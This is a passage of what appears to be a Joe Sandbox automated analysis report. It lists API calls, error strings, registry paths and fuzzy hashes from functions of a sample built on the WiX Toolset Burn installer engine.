                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?), ref: 008E4517
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 008E4525
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 008E45B4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$FileModuleName
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for module path.$Failed to get max length of input buffer.$Failed to get path for executing process.$Failed to get size of path for executing process.$Failed to re-allocate more space for module path.$Unexpected failure getting path for executing process.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1026760046-3511924
                                                                                                                                                                                                                                                                            • Opcode ID: d9ba84792b01213536b8f1b6b96ddf5caa4c14fe03f88e615edec6b42b31eee2
                                                                                                                                                                                                                                                                            • Instruction ID: fdf18ed934aea76c3690bef107ba489c94890a74a9717f04ab0c9bb5e03f0937
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9ba84792b01213536b8f1b6b96ddf5caa4c14fe03f88e615edec6b42b31eee2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9412872E41265BBD7215B9A9C4EF7F796CFB07710F020120FE04FB281E2748D0096A1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6CF2,008E6CF2,009031C1,00000000,008E6CF2,009031C1,00000000,00000001,00000000,00020019,008E6CF2,009031C1,009031C1,00020019,00000000,008E6CF2), ref: 00945B9C
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6CF2,009031C1,009031C1,00020019,00000000,008E6CF2,00020019,009031C1,00000000,008E6CF2,-80000001,00000000,009031C1,009031C1,008E6CF2), ref: 00945C87
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,009031C1,009031C1,00020019,00000000,008E6CF2,00020019,009031C1,00000000,008E6CF2,-80000001,00000000,009031C1,009031C1,008E6CF2), ref: 00945C98
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(009031C1,009031C1,009031C1,00020019,00000000,008E6CF2,00020019,009031C1,00000000,008E6CF2,-80000001,00000000,009031C1,009031C1,008E6CF2), ref: 00945CA9
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CC5E: RegQueryInfoKeyW.ADVAPI32(?,008F71DB,008E6DEA,008E7162,008E6EDE,80000002,SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations,00020019,00000000,008E6DEA,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations2,00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager), ref: 0093CC85
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get the number of dependent subkeys under the dependency "%ls"., xrefs: 00945B77
                                                                                                                                                                                                                                                                            • Failed to open the dependents subkey under the dependency "%ls"., xrefs: 00945AE9
                                                                                                                                                                                                                                                                            • Failed to delete the dependents subkey under the dependency "%ls"., xrefs: 00945BD9
                                                                                                                                                                                                                                                                            • Failed to get the number of values under the dependency "%ls"., xrefs: 00945C09
                                                                                                                                                                                                                                                                            • Failed to open root registry key "%ls"., xrefs: 00945A34
                                                                                                                                                                                                                                                                            • Failed to delete the dependent "%ls" under the dependency "%ls"., xrefs: 00945B3A
                                                                                                                                                                                                                                                                            • Failed to delete the dependency "%ls"., xrefs: 00945C62
                                                                                                                                                                                                                                                                            • Failed to open the registry key for the dependency "%ls"., xrefs: 00945A95
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00945A43, 00945B49
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$InfoQuery
                                                                                                                                                                                                                                                                            • String ID: Failed to delete the dependency "%ls".$Failed to delete the dependent "%ls" under the dependency "%ls".$Failed to delete the dependents subkey under the dependency "%ls".$Failed to get the number of dependent subkeys under the dependency "%ls".$Failed to get the number of values under the dependency "%ls".$Failed to open root registry key "%ls".$Failed to open the dependents subkey under the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 852846383-1164676106
                                                                                                                                                                                                                                                                            • Opcode ID: 540651466acd860358ccfc2583ebff6ea4f4add2dc0f486fc3baebbcc4bd797c
                                                                                                                                                                                                                                                                            • Instruction ID: 155f7466e633c5547f1b3edde28b1c74f46414435a1c6c95ea368616714a9f08
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 540651466acd860358ccfc2583ebff6ea4f4add2dc0f486fc3baebbcc4bd797c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A571E732E40F2AFBDB315ED48CCAF6F6A68EF40711F174629B915BA192D2748D40D6D0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094AB27
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094AB36
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094AB45
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get unknown element value., xrefs: 0094AA03
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown element namespace., xrefs: 0094A968
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0094A90C, 0094A917, 0094A92C, 0094A977
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown element name., xrefs: 0094A9DF
                                                                                                                                                                                                                                                                            • Failed to enumerate all attributes on ATOM unknown element., xrefs: 0094AADE
                                                                                                                                                                                                                                                                            • Failed to get unknown element namespace., xrefs: 0094A989
                                                                                                                                                                                                                                                                            • Failed to allocate unknown element., xrefs: 0094A91D
                                                                                                                                                                                                                                                                            • Failed to parse attribute on ATOM unknown element., xrefs: 0094AAF2
                                                                                                                                                                                                                                                                            • Failed get attributes on ATOM unknown element., xrefs: 0094AA59
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown element value., xrefs: 0094AA2B
                                                                                                                                                                                                                                                                            • Failed to get unknown element name., xrefs: 0094A9BA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM unknown element name.$Failed to allocate ATOM unknown element namespace.$Failed to allocate ATOM unknown element value.$Failed to allocate unknown element.$Failed to enumerate all attributes on ATOM unknown element.$Failed to get unknown element name.$Failed to get unknown element namespace.$Failed to get unknown element value.$Failed to parse attribute on ATOM unknown element.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2724874077-2936770743
                                                                                                                                                                                                                                                                            • Opcode ID: 7e9b3cd431552cb323305c77fd67af9068a248420a0b5b0a68fdd8e583b85298
                                                                                                                                                                                                                                                                            • Instruction ID: 2783a74d73949859e389bf840d3b635bd7681f940ac02edcd55daaf6dee97486
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e9b3cd431552cb323305c77fd67af9068a248420a0b5b0a68fdd8e583b85298
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A081CE75780716ABEB159B54CC09F6E777AEFC1B18F124058F605AB2E0EBB09E01CB52
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,008E6570,?,?,008EE2FF,feclient.dll,?,00000000,00000000,?,?,?,008E6C5C,00000000), ref: 008ED854
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008EE2FF,feclient.dll,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008ED860
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorHandleLastModule
                                                                                                                                                                                                                                                                            • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$clbcatq.dll$d:\a\wix4\wix4\src\burn\engine\section.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4242514867-3704064587
                                                                                                                                                                                                                                                                            • Opcode ID: 36bf8b01b01772b9810c2c3f04b6de0dc0e3d6509eb646dc8a856089bedadb04
                                                                                                                                                                                                                                                                            • Instruction ID: 44543ce15f491a83037b4a3526947bee15546fa6721413d364f02bca8b5be5f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36bf8b01b01772b9810c2c3f04b6de0dc0e3d6509eb646dc8a856089bedadb04
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C516771741360B7D721D5474C4AFAAA6A8FB57B69F118029FA18EB2C1E1E08E05C395
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0094699C: FindResourceExA.KERNEL32(?,0000000A,?,00000000), ref: 009469AD
                                                                                                                                                                                                                                                                              • Part of subcall function 0094699C: GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 009469B9
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 0090D2CD
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?), ref: 0090D2E2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$ErrorFindLastResource
                                                                                                                                                                                                                                                                            • String ID: Failed to create UI thread.$Failed to create modal event.$Failed to load splash screen configuration.$Failed to read splash screen configuration resource.$Invalid splash screen type: %i$d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3960716503-2819964678
                                                                                                                                                                                                                                                                            • Opcode ID: d48eb9b5a8ece545a3cae03e8fd526168971d1e7d6e6f0b92f298c88642d5253
                                                                                                                                                                                                                                                                            • Instruction ID: 78baa5aab2e847e02b964557dcf9de7d54d020c0274587051285c13a7f89aaad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d48eb9b5a8ece545a3cae03e8fd526168971d1e7d6e6f0b92f298c88642d5253
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F41D675941615BFEB119BD98C49FAF76BDEB85714F110025FA20F72C0E6B49900CA61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008EA8A3: EnterCriticalSection.KERNEL32(008E7D5B,WixBundleOriginalSource,?,?,008FF8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,008E7D5B,?,00000001,008E7DDB,?,?), ref: 008EA8AF
                                                                                                                                                                                                                                                                              • Part of subcall function 008EA8A3: LeaveCriticalSection.KERNEL32(008E7D5B,008E7D5B,00000000,00000000,?,?,008FF8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,008E7D5B,?,00000001,008E7DDB), ref: 008EA934
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,WixBundleLastUsedSource,?), ref: 008FF087
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,WixBundleLastUsedSource,?), ref: 008FF0A4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareCriticalSectionString$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to combine last source with relative.$Failed to combine last source with source.$Failed to combine layout source with relative.$Failed to combine layout source with source.$Failed to combine source process folder with relative.$Failed to combine source process folder with source.$Failed to copy absolute source path.$Failed to ensure size for search paths array.$WixBundleLastUsedSource$WixBundleOriginalSourceFolder$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1408779843-2177830281
                                                                                                                                                                                                                                                                            • Opcode ID: b3f83284096a2ef53525b984de3d834874cc420d67fd0812206c1039a31539ad
                                                                                                                                                                                                                                                                            • Instruction ID: fd87f6c41ba515e2f85d5296e7cb55fda67657a772608363bbfe3aa22fe5064d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3f83284096a2ef53525b984de3d834874cc420d67fd0812206c1039a31539ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AD17171A4062ABBDF21CE65CC49FAA7AA5FF08715F100165FB04FB2C1D7B0A940CB96
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00943B63: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,008EE202,0100147D,?,?,00000000,00000000), ref: 00943B7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00943B63: GetLastError.KERNEL32(?,?,?,008EE202,0100147D,?,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 00943B85
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00920457,?,00000000,00000000,?,?,00920457,00000000,00000000,00000000,00000000), ref: 00942DAF
                                                                                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(?,?,00920457,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 00942DBB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00920457,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 00942DC5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLast$PointerSize
                                                                                                                                                                                                                                                                            • String ID: Failed to get size of source.$Failed to read from source.$Failed to reset target file pointer.$Failed to set end of target file.$Failed to write to target.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1903691966-2291708945
                                                                                                                                                                                                                                                                            • Opcode ID: 47c9439f653c8c24a5b75dcde515a622b05b85f97810421690a5f7830c46f28a
                                                                                                                                                                                                                                                                            • Instruction ID: 60a4576349167f7b8409aa823f2a9b6bbc75177a686031317cfb5932da827038
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47c9439f653c8c24a5b75dcde515a622b05b85f97810421690a5f7830c46f28a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5918E72E1022D9BDB368F14CC44FEEB6B9FB48740F514095B988A6290D6B0DEC19F90
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate space for burn payload group inside of update bundle struct, xrefs: 009256FA
                                                                                                                                                                                                                                                                            • Failed to copy install arguments for update bundle package, xrefs: 0092596A
                                                                                                                                                                                                                                                                            • Failed to copy download source for pseudo bundle., xrefs: 00925812
                                                                                                                                                                                                                                                                            • Failed to allocate space for burn payload inside of update bundle struct, xrefs: 0092573E
                                                                                                                                                                                                                                                                            • Failed to allocate memory for update bundle payload hash., xrefs: 009258AC
                                                                                                                                                                                                                                                                            • Failed to copy filename for pseudo bundle., xrefs: 009257B1
                                                                                                                                                                                                                                                                            • Failed to copy key for pseudo bundle payload., xrefs: 00925786
                                                                                                                                                                                                                                                                            • Failed to copy local source path for pseudo bundle., xrefs: 009257DC
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\pseudobundle.cpp, xrefs: 009256E7, 009256F2, 0092570C, 0092572B, 00925736, 0092586E, 00925899, 009258A4, 0092597C
                                                                                                                                                                                                                                                                            • Failed to copy id for update bundle., xrefs: 00925917
                                                                                                                                                                                                                                                                            • Failed to copy cache id for update bundle., xrefs: 00925940
                                                                                                                                                                                                                                                                            • Failed to decode hash string: %ls., xrefs: 0092585C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory for update bundle payload hash.$Failed to allocate space for burn payload group inside of update bundle struct$Failed to allocate space for burn payload inside of update bundle struct$Failed to copy cache id for update bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy id for update bundle.$Failed to copy install arguments for update bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy local source path for pseudo bundle.$Failed to decode hash string: %ls.$d:\a\wix4\wix4\src\burn\engine\pseudobundle.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-2400517205
                                                                                                                                                                                                                                                                            • Opcode ID: 7e22ba71c6bc5bb5efd03d4ade5ae28b77b96969c0fff3d124020a06ee5aebf3
                                                                                                                                                                                                                                                                            • Instruction ID: 38d76ed380a39e0d336ab552efc8752f23ef9ce24c0654902b7b7ed262fb3929
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e22ba71c6bc5bb5efd03d4ade5ae28b77b96969c0fff3d124020a06ee5aebf3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D271DAB1780B65BBEB219E658C46F9B7E9CFB45B24F020115BA04FB2C5E3F4D8508B91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(0094639A,00000008,00000000,00000000,00000000,?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000), ref: 0093BB41
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000,?,?,0094639A), ref: 0093BB4B
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000000,?,00000000,00000000,0094639A,?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000), ref: 0093BB9D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000,?,?,0094639A), ref: 0093BBA7
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000000,?,00000000,0094639A,0094639A,0094639A,00000001,00000000,?,?,?,0093BECF,0094639A,00000001,00000000,00000000), ref: 0093BC33
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000,?,?,0094639A), ref: 0093BC3D
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000,?,?,0094639A), ref: 0093BCA1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastToken$Information$CloseHandleOpenProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate token information.$Failed to get information from process token size.$Failed to get information from process token.$Failed to open process token.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3038379890-2680558641
                                                                                                                                                                                                                                                                            • Opcode ID: 20e4226ebbffaf7d734fe28902733703eaea9dcb6e49503d9e7b4728cf71f9a3
                                                                                                                                                                                                                                                                            • Instruction ID: 6ab0b213eeae8b6f9368c7ea06c967d5cc63629f30739ca2c73be94407ddf422
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20e4226ebbffaf7d734fe28902733703eaea9dcb6e49503d9e7b4728cf71f9a3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4541D977A41225B7EB315A599C4EFAF7D6CEF02B50F014015BF48BA1D1EBB48E009AE1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CAFE: RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,008F7102,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,008E6EDE,00000000), ref: 0093CB9B
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6DEA,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002,SOFTWARE\Microsoft\Updates,UpdateExeVolatile,00000000,008E6EDE,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,008E6EDE,00000000), ref: 008F71F8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 008F71B6
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Updates, xrefs: 008F7119
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update, xrefs: 008F7169
                                                                                                                                                                                                                                                                            • UpdateExeVolatile, xrefs: 008F7114
                                                                                                                                                                                                                                                                            • CurrentRebootAttempts, xrefs: 008F70EA
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress, xrefs: 008F714A
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\ServerManager, xrefs: 008F70EF
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending, xrefs: 008F7133
                                                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 008F717F
                                                                                                                                                                                                                                                                            • PendingFileRenameOperations2, xrefs: 008F7196
                                                                                                                                                                                                                                                                            • AUState, xrefs: 008F7164
                                                                                                                                                                                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 008F7184, 008F719B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
